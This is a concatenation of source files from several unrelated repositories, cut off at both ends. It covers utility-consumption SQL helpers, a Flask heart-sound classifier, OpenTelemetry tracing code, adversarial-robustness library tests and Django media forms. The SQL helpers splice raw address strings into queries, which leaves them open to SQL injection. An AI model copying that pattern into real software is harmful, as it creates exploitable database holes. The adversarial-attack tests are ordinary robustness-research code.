NaturalGasReport""") if x: return x else: return "N/A" def cityAvgNatGas(): x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avg from NaturalGasReport""") if x: return x else: return "N/A" def findNatGas(addrs): x = dbutil.runSQLAsDict("""SELECT Consumption from NaturalGasReport, Address Where Address.ID = NaturalGasReport.ADDRESS_ID AND Address.StreetAddress = {}""".format( '\'' + addrs + '\'')) if x: return x else: return "N/A" def streetNatGas(addrs): newAddrs = addrs.split(' ', 1) x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avgSt from NaturalGasReport, Address Where Address.ID = NaturalGasReport.ADDRESS_ID and Address.StreetAddress LIKE {}""".format('\'' + '% ' + newAddrs[1] + '\'')) return x if x: return x else: return "N/A" #class NaturalGasReport(object): # def __init__(self, id, address_Id, month,year, consumption): # self.id = id # self.address_Id=address_Id # self.month = month # self.year = year # self.consumption = consumption ``` #### File: backend/app/water.py ```python import sys sys.path.append("../") from loaddb import dbutil def cityTotalWater(): x = dbutil.runSQLAsDict("""SELECT SUM(Consumption) as tot from WaterReport""") if x: return x else: return "N/A" def cityAvgWater(): x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avg from WaterReport""") if x: return x else: return "N/A" def findWater(addrs): x = dbutil.runSQLAsDict("""SELECT Consumption from WaterReport, Address Where Address.ID = WaterReport.ADDRESS_ID AND Address.StreetAddress = {}""".format( '\'' + addrs + '\'')) if x: return x else: return "N/A" def streetWater(addrs): newAddrs = addrs.split(' ', 1) x = dbutil.runSQLAsDict("""SELECT AVG(Consumption) as avgSt from WaterReport, Address Where Address.ID = WaterReport.ADDRESS_ID and Address.StreetAddress LIKE {}""".format('\'' + '% ' + newAddrs[1] + '\'')) if x: return x else: return "N/A" ``` #### File: backend/loaddb/createtables.py ```python from dbutil import * def createTables(): """ Populate the array with names of sql DDL files """ for sqlFileName in ["Address.sql", "Electricity.sql", "CodeViolationsReport.sql", "FireRescueEMSResponse.sql", "NaturalGasReport.sql", 
"WaterReport.sql"]: try: runSqlFile("create/" + sqlFileName) print "Created table '{}'".format(sqlFileName.split(".sql")[0]) except Exception as e: pass createTables() ```
{ "source": "aabmass/opentelemetry-operations-python", "score": 2 }
#### File: e2e-test-server/e2e_test_server/scenarios.py ```python import contextlib import os from dataclasses import dataclass from typing import Callable, Iterator, Mapping import pydantic from google.rpc import code_pb2 from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import BatchSpanProcessor from opentelemetry.sdk.trace.sampling import ALWAYS_ON from opentelemetry.trace import SpanKind, Tracer from .constants import INSTRUMENTING_MODULE_NAME, TEST_ID class Request(pydantic.BaseModel): test_id: str headers: Mapping[str, str] data: bytes @dataclass class Response: status_code: code_pb2.Code data: bytes = bytes() @contextlib.contextmanager def _tracer_setup() -> Iterator[Tracer]: """\ Context manager with common setup for tracing endpoints Yields a tracer (from a fresh SDK with new exporter) then finally flushes spans created during the test after. """ tracer_provider = TracerProvider( sampler=ALWAYS_ON, active_span_processor=BatchSpanProcessor( CloudTraceSpanExporter(project_id=os.environ.get("PROJECT_ID")) ), ) tracer = tracer_provider.get_tracer(INSTRUMENTING_MODULE_NAME) try: yield tracer finally: tracer_provider.shutdown() def health(request: Request) -> Response: return Response(status_code=code_pb2.OK) def basic_trace(request: Request) -> Response: """Create a basic trace""" with _tracer_setup() as tracer: with tracer.start_span( "basicTrace", attributes={TEST_ID: request.test_id} ): pass return Response(status_code=code_pb2.OK) def complex_trace(request: Request) -> Response: """Create a complex trace""" with _tracer_setup() as tracer: with tracer.start_as_current_span( "complexTrace/root", attributes={TEST_ID: request.test_id} ): with tracer.start_as_current_span( "complexTrace/child1", attributes={TEST_ID: request.test_id}, kind=SpanKind.SERVER, ): with tracer.start_as_current_span( "complexTrace/child2", attributes={TEST_ID: request.test_id}, kind=SpanKind.CLIENT, ): pass with tracer.start_as_current_span( "complexTrace/child3", attributes={TEST_ID: request.test_id}, ): pass return Response(status_code=code_pb2.OK) def not_implemented_handler(_: Request) -> Response: return Response(status_code=str(code_pb2.UNIMPLEMENTED)) SCENARIO_TO_HANDLER: dict[str, Callable[[Request], Response]] = { "/health": health, "/basicTrace": basic_trace, "/complexTrace": complex_trace, } ```
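A hedged dispatch sketch for the scenario map above; the real test server's transport layer is not shown in this file, and `/health` is used so the example does not need Cloud Trace credentials. The names are assumed to be in scope from the module.

```python
# Dispatch a request through the scenario map, falling back to the
# not-implemented handler for unknown scenarios.
req = Request(test_id="local-test", headers={}, data=b"")
handler = SCENARIO_TO_HANDLER.get("/health", not_implemented_handler)
resp = handler(req)
print(resp.status_code)  # code_pb2.OK (0)
```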
{ "source": "aabmass/opentelemetry-python", "score": 2 }
#### File: jaeger/translate/__init__.py ```python import abc from opentelemetry.trace import SpanKind OTLP_JAEGER_SPAN_KIND = { SpanKind.CLIENT: "client", SpanKind.SERVER: "server", SpanKind.CONSUMER: "consumer", SpanKind.PRODUCER: "producer", SpanKind.INTERNAL: "internal", } NAME_KEY = "otel.instrumentation_library.name" VERSION_KEY = "otel.instrumentation_library.version" def _nsec_to_usec_round(nsec: int) -> int: """Round nanoseconds to microseconds""" return (nsec + 500) // 10 ** 3 def _convert_int_to_i64(val): """Convert integer to signed int64 (i64)""" if val > 0x7FFFFFFFFFFFFFFF: val -= 0x10000000000000000 return val class Translator(abc.ABC): @abc.abstractmethod def _translate_span(self, span): """Translates span to jaeger format. Args: span: span to translate """ @abc.abstractmethod def _extract_tags(self, span): """Extracts tags from span and returns list of jaeger Tags. Args: span: span to extract tags """ @abc.abstractmethod def _extract_refs(self, span): """Extracts references from span and returns list of jaeger SpanRefs. Args: span: span to extract references """ @abc.abstractmethod def _extract_logs(self, span): """Extracts logs from span and returns list of jaeger Logs. Args: span: span to extract logs """ class Translate: def __init__(self, spans): self.spans = spans def _translate(self, translator: Translator): translated_spans = [] for span in self.spans: # pylint: disable=protected-access translated_span = translator._translate_span(span) translated_spans.append(translated_span) return translated_spans ```
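Small sanity checks for the helpers above, assuming the module's names are in scope:

```python
print(_nsec_to_usec_round(1_499))              # 1 -- rounds to the nearest microsecond
print(_nsec_to_usec_round(1_500))              # 2
print(_convert_int_to_i64(2**63 + 5))          # -9223372036854775803, wrapped into signed i64
print(OTLP_JAEGER_SPAN_KIND[SpanKind.CLIENT])  # 'client'
```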
{ "source": "aabobakr/adversarial-robustness-toolbox", "score": 2 }
#### File: tests/attacks/test_universal_perturbation.py ```python from __future__ import absolute_import, division, print_function, unicode_literals import logging import unittest import numpy as np from art.attacks.universal_perturbation import UniversalPerturbation from art.classifiers import KerasClassifier from art.utils import load_dataset, master_seed, get_classifier_tf, get_classifier_kr, get_classifier_pt from art.utils import get_iris_classifier_tf, get_iris_classifier_kr, get_iris_classifier_pt logger = logging.getLogger('testLogger') BATCH_SIZE = 100 NB_TRAIN = 500 NB_TEST = 10 class TestUniversalPerturbation(unittest.TestCase): """ A unittest class for testing the UniversalPerturbation attack. """ @classmethod def setUpClass(cls): # Get MNIST (x_train, y_train), (x_test, y_test), _, _ = load_dataset('mnist') x_train, y_train = x_train[:NB_TRAIN], y_train[:NB_TRAIN] x_test, y_test = x_test[:NB_TEST], y_test[:NB_TEST] cls.mnist = (x_train, y_train), (x_test, y_test) def setUp(self): # Set master seed master_seed(1234) def test_tfclassifier(self): """ First test with the TFClassifier. :return: """ # Build TFClassifier tfc, sess = get_classifier_tf() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist # Attack up = UniversalPerturbation(tfc, max_iter=1, attacker="newtonfool", attacker_params={"max_iter": 5}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(tfc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(tfc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) def test_krclassifier(self): """ Second test with the KerasClassifier. :return: """ # Build KerasClassifier krc, sess = get_classifier_kr() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist # Attack up = UniversalPerturbation(krc, max_iter=1, attacker="ead", attacker_params={"max_iter": 5, "targeted": False}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(krc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(krc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) def test_ptclassifier(self): """ Third test with the PyTorchClassifier. 
:return: """ # Build PyTorchClassifier ptc = get_classifier_pt() # Get MNIST (x_train, y_train), (x_test, y_test) = self.mnist x_train = np.swapaxes(x_train, 1, 3) x_test = np.swapaxes(x_test, 1, 3) # Attack up = UniversalPerturbation(ptc, max_iter=1, attacker="newtonfool", attacker_params={"max_iter": 5}) x_train_adv = up.generate(x_train) self.assertTrue((up.fooling_rate >= 0.2) or not up.converged) x_test_adv = x_test + up.noise self.assertFalse((x_test == x_test_adv).all()) train_y_pred = np.argmax(ptc.predict(x_train_adv), axis=1) test_y_pred = np.argmax(ptc.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == test_y_pred).all()) self.assertFalse((np.argmax(y_train, axis=1) == train_y_pred).all()) class TestUniversalPerturbationVectors(unittest.TestCase): @classmethod def setUpClass(cls): # Get Iris (x_train, y_train), (x_test, y_test), _, _ = load_dataset('iris') cls.iris = (x_train, y_train), (x_test, y_test) def setUp(self): master_seed(1234) def test_iris_k_clipped(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_kr() # Test untargeted attack attack_params = {"max_iter": 1, "attacker": "newtonfool", "attacker_params": {"max_iter": 5}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_k_unbounded(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_kr() # Recreate a classifier without clip values classifier = KerasClassifier(model=classifier._model, use_logits=False, channel_index=1) attack_params = {"max_iter": 1, "attacker": "newtonfool", "attacker_params": {"max_iter": 5}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_tf(self): (_, _), (x_test, y_test) = self.iris classifier, _ = get_iris_classifier_tf() # Test untargeted attack attack_params = {"max_iter": 1, "attacker": "ead", "attacker_params": {"max_iter": 5, "targeted": False}} attack = UniversalPerturbation(classifier) attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) def test_iris_pt(self): (_, _), (x_test, y_test) = self.iris classifier = get_iris_classifier_pt() attack_params = {"max_iter": 1, "attacker": "ead", "attacker_params": {"max_iter": 5, "targeted": False}} attack = UniversalPerturbation(classifier) 
attack.set_params(**attack_params) x_test_adv = attack.generate(x_test) self.assertFalse((x_test == x_test_adv).all()) self.assertTrue((x_test_adv <= 1).all()) self.assertTrue((x_test_adv >= 0).all()) preds_adv = np.argmax(classifier.predict(x_test_adv), axis=1) self.assertFalse((np.argmax(y_test, axis=1) == preds_adv).all()) acc = np.sum(preds_adv == np.argmax(y_test, axis=1)) / y_test.shape[0] logger.info('Accuracy on Iris with universal adversarial examples: %.2f%%', (acc * 100)) if __name__ == '__main__': unittest.main() ``` #### File: tests/classifiers/test_detector_classifier.py ```python from __future__ import absolute_import, division, print_function, unicode_literals import logging import unittest import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from art.classifiers.pytorch import PyTorchClassifier from art.classifiers.detector_classifier import DetectorClassifier from art.utils import load_mnist, master_seed logger = logging.getLogger('testLogger') NB_TRAIN = 1000 NB_TEST = 2 class Model(nn.Module): def __init__(self): super(Model, self).__init__() self.conv = nn.Conv2d(1, 16, 5) self.pool = nn.MaxPool2d(2, 2) self.fc = nn.Linear(2304, 10) def forward(self, x): x = self.pool(F.relu(self.conv(x))) x = x.view(-1, 2304) logit_output = self.fc(x) return logit_output class Flatten(nn.Module): def forward(self, x): n, _, _, _ = x.size() result = x.view(n, -1) return result class TestDetectorClassifier(unittest.TestCase): """ This class tests the functionalities of the DetectorClassifier. """ @classmethod def setUpClass(cls): # Get MNIST (x_train, y_train), (x_test, y_test), _, _ = load_mnist() x_train, y_train = x_train[:NB_TRAIN], y_train[:NB_TRAIN] x_test, y_test = x_test[:NB_TEST], y_test[:NB_TEST] x_train = np.swapaxes(x_train, 1, 3) x_test = np.swapaxes(x_test, 1, 3) cls.mnist = (x_train, y_train), (x_test, y_test) # Define the internal classifier model = Model() loss_fn = nn.CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=0.01) classifier = PyTorchClassifier(model=model, loss=loss_fn, optimizer=optimizer, input_shape=(1, 28, 28), nb_classes=10, clip_values=(0, 1)) classifier.fit(x_train, y_train, batch_size=100, nb_epochs=2) # Define the internal detector conv = nn.Conv2d(1, 16, 5) linear = nn.Linear(2304, 1) torch.nn.init.xavier_uniform_(conv.weight) torch.nn.init.xavier_uniform_(linear.weight) model = nn.Sequential(conv, nn.ReLU(), nn.MaxPool2d(2, 2), Flatten(), linear) loss_fn = nn.CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=0.01) detector = PyTorchClassifier(model=model, loss=loss_fn, optimizer=optimizer, input_shape=(1, 28, 28), nb_classes=1, clip_values=(0, 1)) # Define the detector-classifier cls.detector_classifier = DetectorClassifier(classifier=classifier, detector=detector) def setUp(self): # Set master seed master_seed(1234) def test_predict(self): # Get MNIST (_, _), (x_test, y_test) = self.mnist # Test predict logits preds = self.detector_classifier.predict(x=x_test, logits=True) self.assertTrue(np.array(preds.shape == (NB_TEST, 11)).all()) # Test predict softmax preds = self.detector_classifier.predict(x=x_test, logits=False) self.assertAlmostEqual(np.sum(preds), NB_TEST, places=4) def test_nb_classes(self): dc = self.detector_classifier self.assertTrue(dc.nb_classes == 11) def test_input_shape(self): dc = self.detector_classifier self.assertTrue(np.array(dc.input_shape == (1, 28, 28)).all()) def _derivative(self, x, i1, i2, i3, i4, logits): delta = 1e-5 x_minus = 
x.copy() x_minus[:, i2, i3, i4] -= delta x_plus = x.copy() x_plus[:, i2, i3, i4] += delta result_plus = self.detector_classifier.predict(x_plus, logits=logits) result_minus = self.detector_classifier.predict(x_minus, logits=logits) result = (result_plus[:, i1] - result_minus[:, i1]) / (2 * delta) return result def test_class_gradient1(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = None grads = dc.class_gradient(x=x_test, logits=True, label=None) self.assertTrue(np.array(grads.shape == (NB_TEST, 11, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i1 in range(grads.shape[1]): for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, i1, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, i1, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, i1, i2, i3, i4])) def test_class_gradient2(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = 5 grads = dc.class_gradient(x=x_test, logits=True, label=5) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 5, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient3(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = 10 grads = dc.class_gradient(x=x_test, logits=True, label=10) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 10, i2, i3, i4, True) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.5: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient4(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = True and label = array # label = np.random.randint(11, size=NB_TEST) label = np.array([2, 10]) grads = dc.class_gradient(x=x_test, logits=True, label=label) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result1 = self._derivative(np.array([x_test[0]]), 2, i2, i3, i4, True) result2 = self._derivative(np.array([x_test[1]]), 10, i2, i3, i4, True) if np.abs(result1[0]) > 0.5: # print(result1[0], grads[0, 0, i2, i3, i4]) self.assertEqual(np.sign(result1[0]), np.sign(grads[0, 0, i2, i3, i4])) if np.abs(result2[0]) > 0.5: # print(result2[0], grads[1, 0, i2, i3, i4]) self.assertEqual(np.sign(result2[0]), np.sign(grads[1, 0, i2, i3, i4])) def test_class_gradient5(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = None grads = dc.class_gradient(x=x_test, logits=False, 
label=None) self.assertTrue(np.array(grads.shape == (NB_TEST, 11, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i1 in range(grads.shape[1]): for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, i1, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, i1, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, i1, i2, i3, i4])) def test_class_gradient6(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = 2 grads = dc.class_gradient(x=x_test, logits=False, label=2) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 2, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient7(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = 10 grads = dc.class_gradient(x=x_test, logits=False, label=10) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result = self._derivative(x_test, 10, i2, i3, i4, False) for i in range(grads.shape[0]): if np.abs(result[i]) > 0.1: # print(result[i], grads[i, 0, i2, i3, i4]) self.assertEqual(np.sign(result[i]), np.sign(grads[i, 0, i2, i3, i4])) def test_class_gradient8(self): # Get MNIST (_, _), (x_test, _) = self.mnist # Get the classifier dc = self.detector_classifier # Test logits = False and label = array # label = np.random.randint(11, size=NB_TEST) label = np.array([2, 10]) grads = dc.class_gradient(x=x_test, logits=False, label=label) self.assertTrue(np.array(grads.shape == (NB_TEST, 1, 1, 28, 28)).all()) self.assertTrue(np.sum(grads) != 0) # Sanity check for i2 in range(grads.shape[2]): for i3 in range(grads.shape[3]): for i4 in range(grads.shape[4]): result1 = self._derivative(np.array([x_test[0]]), 2, i2, i3, i4, False) result2 = self._derivative(np.array([x_test[1]]), 10, i2, i3, i4, False) if np.abs(result1[0]) > 0.1: # print(result1[0], grads[0, 0, i2, i3, i4]) self.assertEqual(np.sign(result1[0]), np.sign(grads[0, 0, i2, i3, i4])) if np.abs(result2[0]) > 0.1: # print(result2[0], grads[1, 0, i2, i3, i4]) self.assertEqual(np.sign(result2[0]), np.sign(grads[1, 0, i2, i3, i4])) def test_set_learning(self): dc = self.detector_classifier self.assertTrue(dc.classifier._model.training) self.assertTrue(dc.detector._model.training) self.assertTrue(dc.learning_phase is None) dc.set_learning_phase(False) self.assertFalse(dc.classifier._model.training) self.assertFalse(dc.detector._model.training) self.assertFalse(dc.learning_phase) dc.set_learning_phase(True) self.assertTrue(dc.classifier._model.training) self.assertTrue(dc.detector._model.training) self.assertTrue(dc.learning_phase) def test_save(self): model = self.detector_classifier import tempfile import os t_file = tempfile.NamedTemporaryFile() full_path = t_file.name t_file.close() base_name = os.path.basename(full_path) dir_name = 
os.path.dirname(full_path) model.save(base_name, path=dir_name) self.assertTrue(os.path.exists(full_path + "_classifier.optimizer")) self.assertTrue(os.path.exists(full_path + "_classifier.model")) os.remove(full_path + '_classifier.optimizer') os.remove(full_path + '_classifier.model') self.assertTrue(os.path.exists(full_path + "_detector.optimizer")) self.assertTrue(os.path.exists(full_path + "_detector.model")) os.remove(full_path + '_detector.optimizer') os.remove(full_path + '_detector.model') def test_repr(self): repr_ = repr(self.detector_classifier) self.assertTrue('art.classifiers.detector_classifier.DetectorClassifier' in repr_) self.assertTrue('preprocessing=(0, 1)' in repr_) if __name__ == '__main__': unittest.main() ```
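The `_derivative` helper in the detector-classifier tests is a central finite-difference check against the analytic class gradients. Below is a minimal standalone illustration of that scheme; the smooth test function is arbitrary and not taken from ART.

```python
import numpy as np

def central_difference(f, x, delta=1e-5):
    # Same scheme as _derivative above: (f(x + d) - f(x - d)) / (2 d)
    return (f(x + delta) - f(x - delta)) / (2 * delta)

f = lambda x: np.sin(x) * x ** 2                    # arbitrary smooth test function
x = 0.7
numeric = central_difference(f, x)
analytic = np.cos(x) * x ** 2 + 2 * x * np.sin(x)   # exact derivative of f
assert np.sign(numeric) == np.sign(analytic)        # the tests above compare signs only
assert abs(numeric - analytic) < 1e-6               # and the two values agree closely here
```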
{ "source": "AAboElkhair/MyDoctor_Project", "score": 2 }
#### File: AAboElkhair/MyDoctor_Project/app_heart.py ```python import os from flask import Flask,jsonify,request,render_template,redirect from heart_sound import predict from werkzeug.utils import secure_filename app = Flask(__name__) ## __name__= current file name (main) @app.route("/", methods = ["GET", "POST"]) ## page name def index(): prediction = "" if request.method == "POST": print("FORM DATA RECEIVED") if "file" not in request.files: return redirect(request.url) file = request.files["file"] if file.filename == "": return redirect(request.url) if file: app.config['Audio_UPLOADS'] = "" file = request.files['file'] filename = secure_filename(file.filename) file.save(os.path.join(app.config["Audio_UPLOADS"], filename)) actual_file = filename prediction = predict(actual_file) print(prediction) return render_template('index.html', prediction=prediction) app.run(debug=False, threaded = True) ``` #### File: AAboElkhair/MyDoctor_Project/heart_sound.py ```python import numpy as np import librosa import librosa.display import tensorflow as tf CLASSES = ['artifact','murmur','normal'] NB_CLASSES=len(CLASSES) label_to_int = {k:v for v,k in enumerate(CLASSES)} int_to_label = {v:k for k,v in label_to_int.items()} model = None def load_model(): model = tf.keras.models.load_model("heart_sounds1-Copy1.h5") print("Model loaded") return model def preprocessing (file_path, duration=10, sr=22050): input_length=sr*duration process_file=[] X, sr = librosa.load(file_path, sr=sr, duration=duration) dur = librosa.get_duration(y=X, sr=sr) # pad audio file same duration if (round(dur) < duration): y = librosa.util.fix_length(X, input_length) mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sr, n_mfcc=40, n_fft=512,hop_length=2048).T,axis=0) feature = np.array(mfccs).reshape([-1,1]) process_file.append(feature) process_file_array = np.asarray(process_file) return process_file_array def predict(file_path): global model if model is None: model = load_model() process_audio = preprocessing(file_path) pred = np.asarray(model.predict(process_audio, batch_size=32)) prediction_val = np.argmax(pred,axis=1) prediction = "prediction test return :"+ str(prediction_val)+ "-"+str(int_to_label[prediction_val[0]]) return prediction ```
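The preprocessing step above reduces a recording to a single 40-coefficient MFCC vector. The sketch below feeds a synthetic tone through the same librosa call to show the shape the Keras model expects; the sine wave and the shape comment are illustrative assumptions, and librosa is assumed to be installed.

```python
import numpy as np
import librosa

sr, duration = 22050, 10
t = np.linspace(0, duration, sr * duration, endpoint=False)
y = 0.1 * np.sin(2 * np.pi * 220 * t)               # synthetic tone standing in for a heart recording

mfccs = np.mean(librosa.feature.mfcc(y=y, sr=sr, n_mfcc=40,
                                     n_fft=512, hop_length=2048).T, axis=0)
feature = np.array(mfccs).reshape([-1, 1])
batch = np.asarray([feature])                       # what predict() hands to model.predict
print(batch.shape)                                  # expected: (1, 40, 1)
```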
{ "source": "aaboffill/django-allmedia", "score": 2 }
#### File: django-allmedia/media/forms.py ```python import json from django import forms from django.forms.util import ErrorList from django.utils.translation import ugettext_lazy as _ from . import settings from .fields.tags import ModelMultiTagSelectChoiceField from .validators import FileFieldValidator from .decorators import ajax_file_upload from .models import MediaAlbum, Image, Video, MediaTag, Attachment, AjaxFileUploaded, YoutubeVideo class MediaAlbumForm(forms.ModelForm): """ Form to add a media album """ class Meta: model = MediaAlbum fields = ('name', 'location', 'private') class MediaForm(forms.ModelForm): """ Form to add a media object """ tags = ModelMultiTagSelectChoiceField( register_choice=True, queryset=MediaTag.on_site.all(), required=False, help_text=_(u"Enter tag's name.") ) class Meta: fields = ('caption', 'private', 'file', 'tags', 'creator') widgets = { 'creator': forms.HiddenInput(), } def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None): super(MediaForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) self.fields['file'].widget.template_with_initial = '%(input)s' class ObjectMediaForm(MediaForm): class Meta(MediaForm.Meta): fields = ('content_type', 'object_pk', 'caption', 'private', 'file', 'tags', 'creator') class MediaAdminForm(forms.ModelForm): pass # IMAGE FORMS class ImageForm(MediaForm): """ Form to add an image """ class Meta(MediaForm.Meta): model = Image @ajax_file_upload(form_file_field_name="file", content_type="image") class ImageAjaxUploadForm(ImageForm): pass class ObjectImageForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Image @ajax_file_upload(form_file_field_name="file", content_type="image") class ObjectImageAjaxUploadForm(ObjectImageForm): pass class ImageAdminForm(MediaAdminForm): class Meta: model = Image # VIDEO FORMS class VideoForm(MediaForm): """ Form to add a video """ class Meta(MediaForm.Meta): model = Video @ajax_file_upload(form_file_field_name="file", content_type="video") class VideoAjaxUploadForm(VideoForm): pass class ObjectVideoForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Video @ajax_file_upload(form_file_field_name="file", content_type="video") class ObjectVideoAjaxUploadForm(ObjectVideoForm): pass class VideoAdminForm(MediaAdminForm): class Meta: model = Video # YOUTUBE VIDEO FORMS class YoutubeVideoForm(MediaForm): """ Form to add a video """ class Meta(MediaForm.Meta): model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(YoutubeVideoForm, self).save(commit) @ajax_file_upload(form_file_field_name="file", content_type="video") class YoutubeVideoAjaxUploadForm(YoutubeVideoForm): pass class ObjectYoutubeVideoForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(ObjectYoutubeVideoForm, self).save(commit) @ajax_file_upload(form_file_field_name="file", content_type="video") class ObjectYoutubeVideoAjaxUploadForm(ObjectYoutubeVideoForm): pass class YoutubeVideoAdminForm(MediaAdminForm): class Meta: model = YoutubeVideo def save(self, commit=True): self.instance.file.field.tags = [tag.name for tag in self.cleaned_data['tags']] return super(YoutubeVideoAdminForm, self).save(commit) # ATTACHMENT 
